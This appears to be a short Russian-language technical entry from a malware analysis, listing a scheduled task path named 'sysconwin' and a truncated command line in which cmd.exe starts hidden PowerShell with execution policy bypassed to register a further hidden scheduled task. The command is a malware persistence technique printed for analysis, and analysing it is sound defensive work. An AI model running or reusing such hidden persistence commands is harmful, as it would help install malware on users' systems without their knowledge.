Техническая информация
- <SYSTEM32>\tasks\sysconwin
- $url как $path
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "$action=New-ScheduledTaskAction -Execute 'cmd.exe' -Argument '/c powershell.exe -WindowStyle Hidden -NoProfile...